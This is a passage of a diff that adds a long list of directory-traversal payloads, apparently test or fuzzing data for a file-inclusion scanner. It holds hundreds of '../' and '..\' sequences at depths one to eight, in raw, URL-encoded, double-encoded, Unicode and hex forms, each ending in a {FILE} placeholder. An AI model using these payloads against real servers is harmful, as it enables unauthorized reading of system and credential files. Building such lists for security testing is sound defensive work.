+ "true,%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,..\\{FILE}",
+ "true,..\\..\\{FILE}",
+ "true,..\\..\\..\\{FILE}",
+ "true,..\\..\\..\\..\\{FILE}",
+ "true,..\\..\\..\\..\\..\\{FILE}",
+ "true,..\\..\\..\\..\\..\\..\\{FILE}",
+ "true,..\\..\\..\\..\\..\\..\\..\\{FILE}",
+ "true,..\\..\\..\\..\\..\\..\\..\\..\\{FILE}",
+ "true,..%5c{FILE}",
+ "true,..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
+ "true,%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,..%255c{FILE}",
+ "true,..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
+ "true,%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,../{FILE}",
+ "true,../../{FILE}",
+ "true,../../../{FILE}",
+ "true,../../../../{FILE}",
+ "true,../../../../../{FILE}",
+ "true,../../../../../../{FILE}",
+ "true,../../../../../../../{FILE}",
+ "true,../../../../../../../../{FILE}",
+ "true,..%2f{FILE}",
+ "true,..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
+ "true,%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,..%252f{FILE}",
+ "true,..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
+ "true,%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,..\\{FILE}",
+ "true,..\\..\\{FILE}",
+ "true,..\\..\\..\\{FILE}",
+ "true,..\\..\\..\\..\\{FILE}",
+ "true,..\\..\\..\\..\\..\\{FILE}",
+ "true,..\\..\\..\\..\\..\\..\\{FILE}",
+ "true,..\\..\\..\\..\\..\\..\\..\\{FILE}",
+ "true,..\\..\\..\\..\\..\\..\\..\\..\\{FILE}",
+ "true,..%5c{FILE}",
+ "true,..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
+ "true,%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,..%255c{FILE}",
+ "true,..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
+ "true,%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,\\../{FILE}",
+ "true,\\../\\../{FILE}",
+ "true,\\../\\../\\../{FILE}",
+ "true,\\../\\../\\../\\../{FILE}",
+ "true,\\../\\../\\../\\../\\../{FILE}",
+ "true,\\../\\../\\../\\../\\../\\../{FILE}",
+ "true,\\../\\../\\../\\../\\../\\../\\../{FILE}",
+ "true,\\../\\../\\../\\../\\../\\../\\../\\../{FILE}",
+ "true,/..\\{FILE}",
+ "true,/..\\/..\\{FILE}",
+ "true,/..\\/..\\/..\\{FILE}",
+ "true,/..\\/..\\/..\\/..\\{FILE}",
+ "true,/..\\/..\\/..\\/..\\/..\\{FILE}",
+ "true,/..\\/..\\/..\\/..\\/..\\/..\\{FILE}",
+ "true,/..\\/..\\/..\\/..\\/..\\/..\\/..\\{FILE}",
+ "true,/..\\/..\\/..\\/..\\/..\\/..\\/..\\/..\\{FILE}",
+ "true,.../{FILE}",
+ "true,.../.../{FILE}",
+ "true,.../.../.../{FILE}",
+ "true,.../.../.../.../{FILE}",
+ "true,.../.../.../.../.../{FILE}",
+ "true,.../.../.../.../.../.../{FILE}",
+ "true,.../.../.../.../.../.../.../{FILE}",
+ "true,.../.../.../.../.../.../.../.../{FILE}",
+ "true,...\\{FILE}",
+ "true,...\\...\\{FILE}",
+ "true,...\\...\\...\\{FILE}",
+ "true,...\\...\\...\\...\\{FILE}",
+ "true,...\\...\\...\\...\\...\\{FILE}",
+ "true,...\\...\\...\\...\\...\\...\\{FILE}",
+ "true,...\\...\\...\\...\\...\\...\\...\\{FILE}",
+ "true,...\\...\\...\\...\\...\\...\\...\\...\\{FILE}",
+ "true,..../{FILE}",
+ "true,..../..../{FILE}",
+ "true,..../..../..../{FILE}",
+ "true,..../..../..../..../{FILE}",
+ "true,..../..../..../..../..../{FILE}",
+ "true,..../..../..../..../..../..../{FILE}",
+ "true,..../..../..../..../..../..../..../{FILE}",
+ "true,..../..../..../..../..../..../..../..../{FILE}",
+ "true,....\\{FILE}",
+ "true,....\\....\\{FILE}",
+ "true,....\\....\\....\\{FILE}",
+ "true,....\\....\\....\\....\\{FILE}",
+ "true,....\\....\\....\\....\\....\\{FILE}",
+ "true,....\\....\\....\\....\\....\\....\\{FILE}",
+ "true,....\\....\\....\\....\\....\\....\\....\\{FILE}",
+ "true,....\\....\\....\\....\\....\\....\\....\\....\\{FILE}",
+ "true,........................................................................../{FILE}",
+ "true,........................................................................../../{FILE}",
+ "true,........................................................................../../../{FILE}",
+ "true,........................................................................../../../../{FILE}",
+ "true,........................................................................../../../../../{FILE}",
+ "true,........................................................................../../../../../../{FILE}",
+ "true,........................................................................../../../../../../../{FILE}",
+ "true,........................................................................../../../../../../../../{FILE}",
+ "true,..........................................................................\\{FILE}",
+ "true,..........................................................................\\..\\{FILE}",
+ "true,..........................................................................\\..\\..\\{FILE}",
+ "true,..........................................................................\\..\\..\\..\\{FILE}",
+ "true,..........................................................................\\..\\..\\..\\..\\{FILE}",
+ "true,..........................................................................\\..\\..\\..\\..\\..\\{FILE}",
+ "true,..........................................................................\\..\\..\\..\\..\\..\\..\\{FILE}",
+ "true,..........................................................................\\..\\..\\..\\..\\..\\..\\..\\{FILE}",
+ "true,..%u2215{FILE}",
+ "true,..%u2215..%u2215{FILE}",
+ "true,..%u2215..%u2215..%u2215{FILE}",
+ "true,..%u2215..%u2215..%u2215..%u2215{FILE}",
+ "true,..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}",
+ "true,..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}",
+ "true,..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}",
+ "true,..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}",
+ "true,%uff0e%uff0e/{FILE}",
+ "true,%uff0e%uff0e/%uff0e%uff0e/{FILE}",
+ "true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}",
+ "true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}",
+ "true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}",
+ "true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}",
+ "true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}",
+ "true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}",
+ "true,%uff0e%uff0e%u2215{FILE}",
+ "true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}",
+ "true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}",
+ "true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}",
+ "true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}",
+ "true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}",
+ "true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}",
+ "true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}",
+ "true,..%u2216{FILE}",
+ "true,..%u2216..%u2216{FILE}",
+ "true,..%u2216..%u2216..%u2216{FILE}",
+ "true,..%u2216..%u2216..%u2216..%u2216{FILE}",
+ "true,..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}",
+ "true,..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}",
+ "true,..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}",
+ "true,..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}",
+ "true,..%uEFC8{FILE}",
+ "true,..%uEFC8..%uEFC8{FILE}",
+ "true,..%uEFC8..%uEFC8..%uEFC8{FILE}",
+ "true,..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}",
+ "true,..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}",
+ "true,..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}",
+ "true,..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}",
+ "true,..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}",
+ "true,..%uF025{FILE}",
+ "true,..%uF025..%uF025{FILE}",
+ "true,..%uF025..%uF025..%uF025{FILE}",
+ "true,..%uF025..%uF025..%uF025..%uF025{FILE}",
+ "true,..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}",
+ "true,..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}",
+ "true,..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}",
+ "true,..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}",
+ "true,%uff0e%uff0e\\{FILE}",
+ "true,%uff0e%uff0e\\%uff0e%uff0e\\{FILE}",
+ "true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}",
+ "true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}",
+ "true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}",
+ "true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}",
+ "true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}",
+ "true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}",
+ "true,%uff0e%uff0e%u2216{FILE}",
+ "true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}",
+ "true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}",
+ "true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}",
+ "true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}",
+ "true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}",
+ "true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}",
+ "true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}",
+ "true,..0x2f{FILE}",
+ "true,..0x2f..0x2f{FILE}",
+ "true,..0x2f..0x2f..0x2f{FILE}",
+ "true,..0x2f..0x2f..0x2f..0x2f{FILE}",
+ "true,..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}",
+ "true,..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}",
+ "true,..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}",
+ "true,..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}",
+ "true,0x2e0x2e/{FILE}",
+ "true,0x2e0x2e/0x2e0x2e/{FILE}",
+ "true,0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}",
+ "true,0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}",
+ "true,0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}",
+ "true,0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}",
+ "true,0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}",
+ "true,0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}",
+ "true,0x2e0x2e0x2f{FILE}",
+ "true,0x2e0x2e0x2f0x2e0x2e0x2f{FILE}",
+ "true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}",
+ "true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}",
+ "true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}",
+ "true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}",
+ "true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}",
+ "true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}",
+ "true,..0x5c{FILE}",
+ "true,..0x5c..0x5c{FILE}",
+ "true,..0x5c..0x5c..0x5c{FILE}",
+ "true,..0x5c..0x5c..0x5c..0x5c{FILE}",
+ "true,..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}",
+ "true,..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}",
+ "true,..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}",
+ "true,..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}",
+ "true,0x2e0x2e\\{FILE}",
+ "true,0x2e0x2e\\0x2e0x2e\\{FILE}",
+ "true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}",
+ "true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}",
+ "true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}",
+ "true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}",
+ "true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}",
+ "true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}",
+ "true,0x2e0x2e0x5c{FILE}",
+ "true,0x2e0x2e0x5c0x2e0x2e0x5c{FILE}",
+ "true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}",
+ "true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}",
+ "true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}",
+ "true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}",
+ "true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}",
+ "true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}",
+ "true,..%c0%2f{FILE}",
